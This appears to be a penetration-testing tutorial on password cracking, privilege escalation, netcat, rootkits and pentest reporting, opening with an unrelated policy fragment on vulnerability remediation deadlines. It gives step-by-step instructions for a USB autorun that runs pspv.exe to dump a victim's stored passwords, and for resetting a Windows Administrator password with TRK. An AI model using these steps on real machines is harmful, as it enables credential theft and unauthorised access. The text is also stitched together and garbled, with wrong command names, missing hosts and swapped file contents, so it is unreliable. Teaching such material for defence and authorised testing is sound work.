The reports produced by the enterprise vulnerability scanning tool, which should be evaluated for their suitability for this documentation. As part of the yearly security scanning process, departments will be required to document vulnerability scanning and remediation efforts based on that documentation.


Discovered vulnerabilities will be remediated and/or mitigated based on rules such as the following examples:

  • Critical vulnerabilities will be fully addressed within 15 calendar days of discovery.
  • High vulnerabilities will be fully addressed within 30 calendar days of discovery.
  • Medium vulnerabilities will be fully addressed within 60 calendar days of discovery.
  • Low vulnerabilities will be addressed within 90 calendar days of discovery.


Vulnerabilities are considered remediated when the risk of exploitation has been fully removed and subsequent scans of the device show the vulnerability no longer exists. Typically this is accomplished by patching the operating system/software applications or by upgrading software.


Cracking Passwords

Cracking Passwords

You have gathered a lot of information through your scanning, information-gathering, and enumeration processes—information such as usernames, groups, passwords, permissions, and other system details. Now you will use that information to dig into a system and gain access.


This step represents the point where you try to gain entry to a system with the intent of compromising it or gaining information of some sort.


What you need to remember is that this process is reasonably methodical; it includes cracking passwords, escalating privileges, executing applications, hiding files, covering tracks, and concealing evidence. 


Recognizing Strong Passwords

Strong Passwords

Passwords are the most widely used form of authentication in the world, so they are a prime target for attack. Usernames and passwords are used on computer systems, bank accounts, ATMs, and more. The ability to crack passwords is a required skill for you as a pentester because they are an effective way to gain access to a system.


The ways to compromise a password are varied, meaning you have plenty of options open to you. You can compromise a password by exploiting anything from social engineering to defective storage to poor authentication services.


To ensure you understand the cracking process better, let’s examine the characteristics of a strong password.


Passwords are intended to both be easy to remember and not easily guessed or broken. Although it may seem that these two goals are in conflict, in actuality they are complementary.


One of the problems, however, is that when seeking the “perfect” password, many individuals choose something that is easy to remember and that can make it easy to guess.


Some examples of passwords that lend themselves to cracking include the following:

  • Passwords that contain letters, special characters, and numbers: stud@52
  • Passwords that contain only numbers: 23698217
  • Passwords that contain only special characters: &*#@!(%)
  • Passwords that contain letters and numbers: meetl23
  • Passwords that contain only uppercase or only lowercase:



  • Passwords that contain only letters and special characters: rex@&ba
  • Passwords that contain only special characters and numbers: 123@$4
  • Passwords of 11 characters or less


You may already be aware of some or all of these rules seen on this list as they are commonly recommended guidelines in corporations and when setting up any sort of password for any reason. Remember, a password with one of the points of this list is bad; a password exhibiting more than one of the points on this list is even weaker.


Choosing a Password-Cracking Technique

Password-Cracking Technique

Numerous techniques are used to reveal or recover a password. While each takes a slightly different approach, they all can yield a password.


Dictionary Attacks Attacks of this type take the form of a password-cracking application, which employs a list of commonly used potential passwords pre-loaded (or manually) loaded into it via a text document. The cracking application uses this file to attempt to recover the password by using the words on this list.


The list helps to accelerate the cracking process by allowing the attacker to get a head start on words that are commonly used as passwords. These lists can be downloaded for free from many websites, some including millions of words.


Brute-Force Attacks In this type of attack every possible combination of characters is attempted until the correct one is uncovered. While this attack has the ability to be successful, many modern systems employ techniques such as account lockouts and bad login counts (called a threshold) to stop this approach from being successful.


Usually, thresholds have a set limit of three to five attempts. After the limit has been exceeded, the account will be locked out and will require an administrator to reset the password on the account.


Hybrid Attack This form of password attack builds on the dictionary attack but with additional steps as part of the process. For instance, it can use a dictionary attack but add extra common components such as a 1 or ! at the end.


In addition to those techniques, there are four different types of attacks, each of which has a different approach to recovering and uncovering a password. Typically, the various password-cracking techniques are broken down even further into the following types:


Passive Online Attacks Attacks falling into this category are those that are carried out simply by sitting back and listening. One technique for accomplishing this is by tapping into the network and using a technology known as a sniffer to observe the traffic looking for passwords.


Active Online Attacks This category of attack is more aggressive than passive in that the process requires deeper engagement with the targets. Attacks in this form are meant to more aggressively target a victim with the intention of breaking a password.


Offline Attacks This type of attack is designed to prey on the weaknesses not of passwords, but of the way they are stored on systems. Since passwords must be stored in some format, an attacker will seek to obtain the credentials.


Nontechnical Attacks Also known as nonelectronic attacks, this type of attack moves the process offline into the real world. Typically attacks of this type are squarely in the form of social engineering or manipulating human beings. A closer look at these attacks will reveal some insights that you can use later.


Executing a Passive Online Attack

Passive Online Attack

A massive online attack is an attack where the individual carrying out the process takes on a “sit back and wait” attitude. The overall effectiveness of this attack depends partly on how quiet the attacker can be as well as how weak the password system itself is.


Network Sniffing or Packet Analysis

A packet sniffer is something that we will dedicate more time to later, but let’s bring up the topic briefly here as a means of obtaining a password. A sniffer is a piece of software or hardware that can be used to listen to and observe information or traffic as it passes over a network.


Typically used for performing network diagnostics, packet sniffers can be used for more mischievous purposes in the form of stealthily listening in on network activity.


What makes sniffing an effective means of gathering information? Well, in many cases it is the use of insecure protocols such as FTP, Telnet, SMTP, and POP3, among others.


In many cases, these protocols are either being phased out or are being supplemented with additional security measures via other technologies such as SSH. Either way, many networks still implement legacy protocols that can leave passwords in plaintext and vulnerable to being picked up by an attacker.


Interestingly enough, it’s not just older protocols that are vulnerable; some of the new ones are too. For example, the protocols used by Voice Over IP (VoIP) have been shown to be vulnerable to sniffing. In some cases, calls can be intercepted and decoded with a sniffer.



This type of attack takes place when two different parties communicate with one another with a third party listening in. Once this party starts to listen in, they pick a point to either take over the connection from one of the original individuals or choose to alter the information as it flows between the two.


The act of listening in would be passive, but once the attacker alters the packets, we quickly move into the active side.


This type of attack is particularly useful and takes advantage of the same protocols that are vulnerable to sniffing. Protocols such as Telnet and FTP find themselves particularly vulnerable to this type of attack, partly because they transfer authentication data (username and password) in the clear.


Executing an Active Online Attack

Active Online Attack

The opposite of passive is active, and in this case, we are talking about active online attacks. Attacks that fit into this category are those that require direct interaction with a system in an attempt to break a password.


These attacks have the advantage of being faster in many cases, but they also have the downside of being less stealthy and therefore more likely to be detected.


Password Guessing

While decidedly low-tech, password guessing is a valid and somewhat effective form of obtaining a password. During this process, an attacker will attempt to gain a password by using a piece of software designed to test passwords from a list imported into the application.


During the process, the application will attempt all variations, including case changes, substitutions, digit replacement, and reverse case.


Stealing Passwords with Flash Drives

Stealing Passwords

The flash drive is another way to steal passwords or other data from a system. Basically, this process involves embedding a script or program (or both) on a flash drive before plugging the device into a target system. Since many users store their passwords for applications and online sites on their local machine, that information may be easily extracted using the script.


In this exercise, we will attempt to extract passwords from a system using NirSoft’s pspv utility. pspv.exe is a protected storage password viewer that will display stored passwords on a Windows system if they are contained in Internet Explorer or other Microsoft-based applications. It is guaranteed to work on Windows Vista and 7, with limited success on Windows 8 and higher.


  • 1. Copy the utility to the USB drive.
  • 2. Create a Notepad file called launch.bat with the following lines in the file: [autorun] en = launch.bat
  • 3. After creating the file, save it to the USB drive.
  • 4. Open Notepad and create the following lines: Start pspv.exe /s passwords.txt
  • 5. Save launch.bat to the USB drive.


At this point, the USB drive can be inserted into a target computer. Once inserted into a victim PC, pspv.exe will run and extract passwords and place them in the passwords.txt file, which can be opened in Notepad.


Note that this type of attack requires something else to be in place to make it successful: physical access. With physical access to a system, it is possible to carry out a wide range of attacks, and USB-style attacks are just the beginning. The unaware user most likely will plug the USB device into a computer out of curiosity.


Another way of stealing passwords via USB is through the use of a device known as the USB Rubber Ducky from Hak5. This piece of hardware can be plugged into a USB port, but instead of identifying as a storage device it shows up as a keyboard.


Since most operating systems will not block the installation of human interface devices, the device will be recognized and any scripts on it can be configured to do any sort of action. 


  • Micro SD Storage 60 MHz 32-Bit CPU
  • Replay Button Covert Case
  • LED Indicator
  • Optional Decal
  • Type A Plug


Escalating Privileges

Once an account has been compromised and its password cracked, the next step is doing something with these new privileges. This is where privilege escalation comes in. Privilege escalation is the process where the access that is obtained is increased to a higher level where more actions can be carried out.


The reality is that the account you’ll access typically will end up being a lower privileged account and therefore one with less access. Since you will most likely inherit an account with lower privileges, you will need to increase them somehow.


Privilege escalation can take one of two forms: horizontal and vertical escalation. Vertical escalation is when an account is compromised and the privileges of that account are increased to a higher level.


A horizontal escalation is when an account is compromised and then another account with higher privileges is escalated using the abilities of the first account.


Each operating system includes a number of accounts preconfigured and installed. In the Windows operating system, users such as the administrator and guest are already present on the system in every case.


Because it is easy to extract information about the accounts that are included with an operating system, additional care should be exercised to guarantee that such accounts are secure.


One way to escalate privileges is to identify an account that has the access desired and then change the password. Several tools offer this ability, including the following:

  • Active@ Password Changer Trinity Rescue Kit
  • ERD Commander
  • Windows Recovery Environment (WinRE) Kali Linux


Parrot OS

One of these tools, the Trinity Rescue Kit (TRK), is a Linux distribution that is specifically designed to be run from a CD or flash drive. TRK was designed to recover and repair both Windows and Linux systems as well as perform some system functions such as resetting passwords and escalating privileges.


Once TRK is in the environment, a simple sequence of commands can be executed to reset the password of an account.


The following steps change the password of the Administrator account on a Windows system using TRK:

1. At the command line, enter the following command: winpass -u Administrator


The win pass command will then display a message similar to the following: Searching and mounting all file system on the local machine

Windows NT/2K/XP installation(s) found in:
  • 1: /hda1/Windows Make your choice or 'q' to quit [1]:
  • 2. Type 1 or the number of the location of the Windows folder if more than one install exists.
  • 3. Press Enter.
  • 4. Enter the new password or accept TRK’s suggestion to set the password to a blank.
  • 5. You will see this message: “Do you really wish to change it?” Type Y and press Enter.
  • 6. Type init 0 to shut down the TRK Linux system.
  • 7. Reboot.


Inserting Trojans

Inserting Trojans

Let’s talk about something you can use during penetration testing: Trojans. So what is a Trojan? In simple terms, it is a piece of software designed to entice a victim into executing it by appearing as something else, typically by wrapping itself up in another program as a carrier.


By using another program as its carrier, it relies on what is known as social engineering or taking advantage of human behavior, to carry out its infection.


Once on a system, its goals are similar to those of a virus or worm: to get and maintain control of the system or perform some other task.


Why would you choose to deploy a Trojan instead of an actual virus or another item? The primary reason is that they are typically stealthy and therefore can elude detection, coupled with the fact that it can perform a wealth of actions behind the scenes that may be more obvious when performed by other means.


So what is a way to detect a Trojan? Well, one way is to determine if the Trojan is contacting another system by opening up connections to another system. You can do this through the use of netstat. This tool is included with the Windows operating system and can be used to perform a number of tasks—in this case, to detect open communication ports.


To use netstat, follow these steps:

  • 1. Open a command prompt.
  • 2. At the command line, enter netstat –an.
  • 3. Observe the results.


On most systems, you will see a number of ports open and listening, but the type and number will vary depending on the system and what is running. In practice, you would look at the results with an eye toward anything that may be unusual and require additional attention.


 Netstat is a powerful tool, but one of its shortcomings is the fact that it is not real time and must be rerun to get current results. However, if you wish to view results in real time, an option available to you is TCPView.


If you do not already have TCPView, you can download it for free from Microsoft - Official Home Page.


To use TCPView, follow these steps:

1. In Windows, run the tcpview.exe executable.

2. Observe the results in the GUI.

3. With TCPView still running, open a web browser, and go to In TCPView, notice the results and that new entries have been added.


5. In the browser, go to YouTube (or some other site that streams video or audio), and play a video or piece of content.


6. In TCPView, watch how the entries change as ports are opened and closed. Observe for a minute or two, and note how the display updates.

7. Close the web browser.

8. In TCPView, observe how the display updates as some connections and applications are removed.


When using TCPView, you can save snapshots of the screen contents to a TXT file. This feature is extremely helpful for investigation and later analysis of information, and potentially for incident-management purposes later.


Working with Netcat

Let’s get down to business with one of the most popular tools used for network administration but also used as a Trojan in some cases. Netcat is an application that was created to be a network analysis tool.


It can be used to open up TCP and UDP connections between two machines over any port desired. It can also be used as a port scanning tool, similar to N-map, in a pinch if needed or if other methods are proving ineffective.


In addition, Netcat can be useful for allowing a connection to be opened to a remote system. If netcat is used on its own, it can be effective at allowing the opening of a remote shell on a system. However, if netcat is bundled within another executable, it can be used as a Trojan and delivered to a target.


Netcat is made up of one executable that can be configured to be run both as a client and as a server depending on whatever your particular goals may be.


Usually, the process of using netcat would involve getting it onto a victim system and then using a client to attach to the system and issue commands to the host (which you could do by creating a Trojan or other mechanism to deploy the software onto a victim system).


It is also possible to get the software onto a victim system simply through pure social engineering methods such as phishing.


For our purposes, you will assume that the netcat software is present on the client and that you have free access to the “victim” system to install and configure the netcat software at will. You will also assume that both the client and server are Windows-based, though the commands here (much like netcat) will work on Windows, Linux, and Unix platforms.


The power of netcat is unlocked by first understanding its syntax and how it functions. First, netcat functions by opening up TCP connections to a host for the purpose of communication with the remote system.


These connections to a remote system can be used to perform a wide range of operations, but those operations start by using a fairly easy-to-understand structure or syntax, like so:


 cc [options] <host address> <port number>


This command will send a request to a remote system defined in the host address and port number much in the way Telnet does.


It is also possible to make UDP connections to a host if an additional level of stealth is required. To use UDP-based connections, simply issue the following command:

cc -u <host address> <port number>


With an understanding of this basic syntax, it is possible to use netcat to perform something that you executed earlier, namely a port scan. How would you do this? By issuing the following command:

nc -z -v <host address> 1-1000


This command will scan all the ports from 1 to 1000. The -z option tells netcat not to attempt a connection, therefore lowering the chances of detection. Finally, the -v option tells netcat to be verbose and therefore provide more information about the actions it is performing.


The output will look similar to the following:

nc: connect to port 1 (tcp) failed: Connection refused

nc: connect to port 2 (tcp) failed: Connection refused

nc: connect to port 3 (tcp) failed: Connection refused

nc: connect to port 4 (tcp) failed: Connection refused

nc: connect to port 5 (tcp) failed: Connection refused

nc: connect to port 6 (tcp) failed: Connection refused

nc: connect to port 7 (tcp) failed: Connection refused

. . .

Connection to 22 port [tcp/ssh] succeeded!

. . .

The scan will provide a lot of information, but when finished you will have an idea of what ports are open or closed on a target.


Now think of deploying netcat to a system as a Trojan. Once the victim has unknowingly installed the software on their system, it is possible to use the technique here to scan other hosts on the victim’s own network. You will see how to do this in just a moment.


Much like Telnet, net-cat does not encrypt or take other actions to protect its communications and therefore eavesdropping and detection is possible. The messages returned are sent to standard error. You can send the standard error messages to standard out, which will allow you to filter the results easily.


Talking with Netcat

Netcat is definitely not a one-trick pony and can do much more, such as communicating between hosts. Netcat gives us the opportunity to connect two instances of netcat in a client-server relationship and communicate.


Which computer acts as the server and which one is the client is made during the initial configuration, and then you’re ready to go. After the connection is established, communication is exactly the same in both directions between the two points. 


To do this type of communication, you must perform a couple of steps. First, you need to define the client, which can be done by issuing the following command: 

nc -l 4444


This configures netcat to listen for connections on port 4444. Next, on a second machine initiate a connection by issuing the following command: 

netcat 4444


On the client, it will look as if nothing has happened because no command windows open up. However, once the connection is successful you will receive a command prompt on your system, from which you can issue commands to the remote host. When finished passing messages, simply press Ctrl+D to close the connection.


Sending Files through Netcat

Building on the previous example, you can accomplish more useful tasks. Let’s see how you can transfer files to a remote host, which could easily set up something more serious later. Because you establish a standard TCP connection, you can transmit any kind of information over that connection—in this case, a file.


To make this happen, you must first choose one end of the connection to listen for connections. However, instead of printing information onto the screen, as you did in the last example, you will place all of the information straight into a file:

 netcat -l 4444 > received_file


On the second computer, create a simple text file by typing echo "Hello, this is a file" > original_file You can now use this file as an input for the netcat connection you will establish to the listening computer. The file will be transmitted just as if you had typed it interactively:

netcat 4444 < original_file


You can see on the computer that was listening for a connection that you now have a new file called received_file with the contents of the file you typed on the other computer:

Notepad received_file

Hello, this is a file


As you can see, by using netcat you can easily take advantage of this connection to transfer all kinds of things, including whole directories of information.


Installing Rootkits

A rootkit is a very dangerous form of malware. This type of malware gets installed on a computer at the kernel level and can provide remote access, system information, and data information; perform spying operations; install software; and many other tasks, all without disclosing its presence to the system or the user.


Rootkits have been around since the 1990s and have evolved to become more dangerous and malicious in nature over the years. In fact, the modern versions of rootkits can embed themselves so tightly into the kernel of an operating system that they can fundamentally alter the operating system’s own behaviors.


Requests from the operating system and, by extension, applications, can be intercepted and responded to with false information. Since the rootkit is typically designed to hide its processes from the operating system and system logs, it is difficult to detect and remove.


Under ideal circumstances, an attacker can place a rootkit on a system quickly and effectively, employing methods mentioned elsewhere in the blog, such as a Trojan. A user receiving the malicious content could inadvertently activate the rootkit and cause it to become installed on the system.


The process of installation can be so quick and so stealthy that no red flags will be displayed. Under other conditions, just the act of browsing the Internet and encountering an infected site is enough to cause the infection.


Once the rootkit is installed, the hacker can secretly communicate with the targeted computer whenever it is online to trigger tasks or steal information. In yet other situations, the rootkit can be used to install more hidden programs and create “backdoors” to the system.


If the hacker wants information, a keylogger program can be installed. This program will secretly record everything the victim types, online and off, delivering the results to the interloper at the next opportunity.


Other malicious uses for rootkits include compromising several hundred or even hundreds of thousands of computers to form a remote “rootkit network” called a botnet.


Botnets are used to send distributed denial-of-service (DDoS) attacks, spam, viruses, and Trojans to other computers. This activity, if traced back to the senders, can potentially result in legal seizure of computers from innocent owners who had no idea their computers were being used for illegal purposes.



No job is complete until the paperwork is done, and that is definitely true with the process of penetration testing a client’s network and overall environment. Upon completion of a successful test, a client will expect a report documenting the results and providing suggestions and recommendations for addressing any deficiencies found on their network.


This important part of the process will wrap up all the tasks and processes you performed into a package that will be presented to senior-level employees and technical staff in the target organization as well as kept on file for compliance and legal purposes.


A report should present the outcome of the pen testing process and include objectives, methodologies you used, vulnerabilities, successful exploitations of those vulnerabilities, recommendations, and other relevant and supporting documentation required by the client.


Reporting the Test Parameters

The first section of the report should be the planning phase or section. This section documents some of the basic points that are going to be addressed and covered by the report itself. When writing the report, you as the pen-tester will use this section as the basis for the rest of the report and will communicate essential points that need to be known right up front.


The document may borrow heavily from your initial interactions and interviews with the client. In fact, this section of the document should at least reflect some of these initial conversations with the client to set the focus for the rest of the report.


In practice, the main focus of this phase is to have an effective level of documentation representing conversations between the point of contact in the corporation on the client side and the pentester, which will focus on a number of key points:


Objectives Audience Time

These are the five most basic points for the planning phase; we’ll take a closer look at each one of these points next:

Objectives The Objectives section is an important point in the planning phase for beginning the project. In this phase, the pentester decides the specific objectives of the project and what needs to be documented.


Consider the Objectives portion of the document or report to be an executive summary of what is to follow. The section serves to help the audience in gaining a high-level understanding of the project.


The Objectives section gives a quick overview of the project, project goals, the overall scope of the project, and how this report is going to help in achieving those goals.


Audience Defining the audience for a report is essential because doing so can ensure that the report is being read by the proper people and that these individuals possess the required level of understanding to make use of the information.


The pen testing report may be read by a wide range of individuals—anyone from the chief information security officer to the CEO, to any number of technical and administrative personnel within the client organization.


Who you’ve created the report for should be considered not only when writing the document but also when delivering it to ensure that the results get into the right hands: those who can make the best use of it.


Once the report is written, it is very important to ensure that it has been constructed in such a way that the audiences you define here in this section are the ones who will be able to decipher and understand it.


Time This section of the document establishes a timeline or timeframe as to when the testing took place. This section should include the start and completion times of the test. In addition, this section should include what hours and times of day the test was conducted if it was not conducted around the clock.


This description of time will serve to establish that the test met its goals and was conducted under conditions that were ideal or that best represented certain operating conditions.


Classification Since the penetration test report includes highly sensitive information such as security loopholes, vulnerabilities, credentials, and system information, the report should be classified as extremely sensitive. The pentester should also make sure that the report is always handed over to a responsible person as defined by the client.


Classification of the project and report should be discussed with a contact person at the beginning of the project in order to make sure that no classified information is given to an unauthorized person. The pentester should also discuss how classified information should be documented in the report.


In today’s environment, many clients are choosing to distribute the reports digitally instead of in a traditional printed format due to the ease of distributing the report as well as the additional security options that are available.


In the event that a client asks for a report in a digital format, ensure that security measures such as digital signing and encryption are used to ensure that the report hasn’t been altered and is kept confidential at all times.


Distribution management of the report plays an important role in making sure that the report should be handed over to an authorized person within a proper timeline.


Collecting Information

During the pen testing process, it is important that you keep complete notes of every action or task you perform as well as the results and motivations of each. Over time as you develop your skills, knowledge, and experience as a pentester, you will better learn what should and shouldn’t be documented or recorded.


As you become more experienced and knowledgeable as a pentester, chances are you will learn about third-party products and utilities that can help you document your steps without being too intrusive or disruptive to your work. You should at the least maintain proof of the following actions:


Successful exploit Performed exploits


Failure in infrastructure during a pen testing process

The question is how can you maintain this information and include it in your report? Many options are available to you; here are some of the ways that you might consider recording this information for inclusion in your reports:


Screenshot Taking screenshots of both unsuccessful and successful exploits, errors, messages, or other results is necessary to document your actions. For example, after the successful completion of a given exploit, take a screenshot of the report to show the results of that exploit as well as to protect against the possibility of an exploit not working a second time.


Screenshots that show error messages, as well as other outputs, are also useful because they can be presented to the client and technical or other personnel to illustrate specific issues they need to address.


Logging Since undoubtedly a vast amount of information will be generated that will go into the logs of various applications across various systems, it makes sense that this information should be included in the report as well.


What logs you choose to include as part of the report will vary dramatically depending on the client, but expect to have some logs included in your documentation. Due to the sheer volume of logs that can be generated, you may find that a report in digital form may be convenient at this point.


Scripts Where appropriate, you may choose to include any self-written or other scripts that you made use of during the pen testing process. Typically this is done to illustrate certain details to technical staff or technical-oriented personnel.


Highlighting the Important Information

With every report, there will be important information relating to the structure and format of the document. In this section, we will cover some of these basic items that will be included in every report outside of the actual testing data.


A report document should have the following structure:

  • Report cover page Report properties Report index
  • Executive summary List of findings
  • Findings in detail


You should expect to spend a large amount of time structuring this document. Let’s take a look at basic points:

Report Cover Page This is the very first page of the report, which will give basic information about the project. A typical cover page should include the following:

  • Project title Client name Report version
  • Author information Date


Report Properties This second page provides more information about people involved in the project. This page will provide the following information:


Client information

  • Pen testing company’s information Pentester information
  • Information about other people involved in the project


Report Index This section consists of a table of contents and images for easing accessibility of the content of the report:

The Table of Contents lists the main topic headings and their page numbers. The lower headings are listed as well, but including page numbers is not necessary. The Table of Figures lists each of the images used in the report along with the title and page number.


Executive Summary The Executive Summary section should be written after project completion with the goal of giving a brief description of the pen test. This section is designed for higher-level employees. It describes the methodology used, high-level findings, and organization security levels in a limited amount of text.


The Project Objectives section includes the objectives of conducting the pen test and how the test helped to accomplish those objectives.


The Scope of the Project section describes permissions and limitations of the project by clearly picturing boundaries of the conducted pen test.


It includes information about the target system to be tested; the type and depth of the pen test based on budget and allocated time; and limitations of the project and their effects.


The Authorization section gives information about permissions for conducting the pen test. No pen test should begin before getting proper written authorization from the client and third-party service provider. This information should be documented in the report.


Every assumption made by the pentester should be clearly mentioned in the report section because doing so will help customers understand the reason for the approaches taken during the testing. Pen testing is an intrusive process, so clearly describing an assumption will protect the pentester.


The Timeline section represents the life cycle of the pen testing process in terms of timing. This section includes the duration of the process, including when the target was tested.


This section helps the pentester by clearly stating that all the findings have been discovered in the timeframe described and later in case of newly evolved vulnerabilities (any configuration changes are not a responsibility of the pentester).


The Summary of Conducted Penetration Test section gives a brief technical overview of the pen test by describing high- and medium-level findings. Only important findings should be reported and should be described within a single sentence. This section also describes the methodology used for a pen test.


List of Findings In the List of Findings area, all levels of findings are documented in a tabular form to provide quick information about security vulnerabilities in the targeted system. The list of findings can be divided according to the conducted test.


So if the pen test targeted web applications, IT infrastructure, and mobile applications, a separate list of findings can be created for every tested environment.


If a huge IT infrastructure test was conducted, then a small list of findings can be created by including only high- and medium-level vulnerabilities and a complete list can be included in each respective section.


The Findings in Detail section features suggested recommendations on which the complete remediation will be based. This area will be read by people dealing directly with IT/information security and IT operations. So the pentester is free to write everything related to exploits in technical terms. This area includes the following details:


In the Definition of Vulnerability section, a base of performed exploits is established by providing detailed information about vulnerabilities. Explanations should be directly based on the environment in which the pentester has worked. The pentester can recommend an appendix and references area for gathering more information.


In the Vulnerability section, the pentester should describe the root cause of the vulnerability by highlighting the assessed environment.


For example, in the case of SQL injection in a login page, the pentester should mention that the username field is vulnerable for certain types of SQL injection attacks and list those types rather than just giving a rough idea that the login page is vulnerable to SQL injection attacks and then leaving the customer to solve the puzzle.


In the Proof of Concept area, the pentester provides a proof of concept of the exploits performed. In most cases, screenshots or outcomes of the exploits suffice. For example, in the case of a cross-site scripting attack, the attack vector and a screenshot of the outcome should be more than enough.


The Impact area explains the impact of a possible exploit. The impact of an exploit always depends on how severe the outcomes will be. For example, reflected cross-site scripting in a login parameter will have a higher impact than reflected cross-site scripting in a search parameter. So it is important to analyze and represent the impact of the attack based on the tested environment.


The Likelihood area explains the likelihood of an exploit. Likelihood always depends on how easy, publicly available, credible, and inter-action dependent that attack is. By interaction dependent, I mean whether it’s possible to perform that attack without having any human intervention and authorization.


For example, the likelihood of an arbitrary code execution attack by Metasploit will be higher than the likelihood of a privilege escalation attack.


The Risk Evaluation area is where the final level of risk should be determined based on vulnerability, threat, impact, and the likelihood of the attack. After risk evaluation, the pentester should write and create a respective finding by flagging the risk level.


Presenting a piece of vulnerability in your findings without documenting in a Recommendations section on how the vulnerability could be managed means you’ve done only half of your security assessment job.


At the end of this process, you should expect to have produced at least two reports to be delivered and/or presented to the client. One report should be more in-depth technical and targeted toward staff who have their primary focus on risk mitigation strategies.


The second report should be less technically oriented in nature and be intended for senior management for business purposes and long-term strategy development.


The client may ask for the reports to be delivered digitally and thus no other actions are required. Or the client may request a formal presentation to be delivered to technical staff and management. Additionally, the client may ask for you, the pentester, to work with technical staff to develop solutions and strategies to the problems you discovered.


Adding Supporting Documentation

Supporting information is all the information that is helpful for explaining all the exploits, but report and remediation of exploits should not depend directly on this information.


The following information can be included in your report as supporting data:

Methodology In this section, list the methodology you used for conducting the testing. For example, you could reference the Penetration Testing Execution Standard (PTES) here. Tools In this section list all the tools you used for testing. This section explains how many resources you used for the vulnerability assessment project.


A report’s primary purpose is to show everything that you have done and how successfully you have cracked your client’s security. A report describes vulnerabilities in their environment and what steps they should take. But sometimes you want a place to give a more generalized and detailed explanation—and the appendix is that place.


References Sometimes you will find yourself in a situation where you can not do a demonstration of an attack. In that case, you can use the work of other researchers and authors as a reference. You do not have all the time in the world to write every single detail, but by providing references you present a real scenario of the exploit.


Glossary A pen testing report is an outcome of a complete technical procedure that mostly revolves around highly technical terms. For management people, you should create a glossary of the technical terms at the end of the report that gives simple definitions of all the technical terms.


Conducting Quality Assurance

Conducting Quality Assurance

We are human and humans make mistakes, but our clients may not appreciate that, and for IT security they will not appreciate even a negligible mistake. So after you write your first report—which is basically a draft report because it has not been through quality assurance—it should be reviewed by yourself or, ideally, by an additional member of your staff.


Technical quality assurance is a kind of very short pen test. During a regular pen test, there could be various possibilities, such as the pentester forgetting to check some vulnerabilities, misunderstanding some vulnerabilities, or failing to document some vulnerabilities properly.


So, technical quality assurance is there to assure the quality of the report and the project in technical terms.


Technical quality assurance should assure that the pentester has checked for every obvious possibility. An example is when the tester has checked a login page for XSS attacks, brute-force attacks, and password policy but forgot to do a check for SQL injection, user enumeration, and other possible attacks.


Web applications could be highly vulnerable. Another example is when the tester has reported a web information disclosure vulnerability but has not reported an unpatched web server in use. The technical quality assurance phase should make sure that every possible pen test has been done based on the given time-frame for assessment.


Technical quality assurance should make sure that the pentester has not misunderstood any vulnerability and raised a wrong flag. For example, say the tester reported a cross-site scripting vulnerability where a SQL error was received in response—possibly the tester misunderstood the possibility for a SQL injection attack.


Another goal of technical quality assurance is to assure the quality of the report. You can have various types of clients; some of them can be from an intensive technical background and some of them could be new to the industry.


So keep every type of audience in mind and try to write as detailed an explanatory report as possible. Normally reports should include definitions, cause, proof, risk evaluation, solutions, and references for possible attacks. All these points should be written with simplicity and detailed explanation.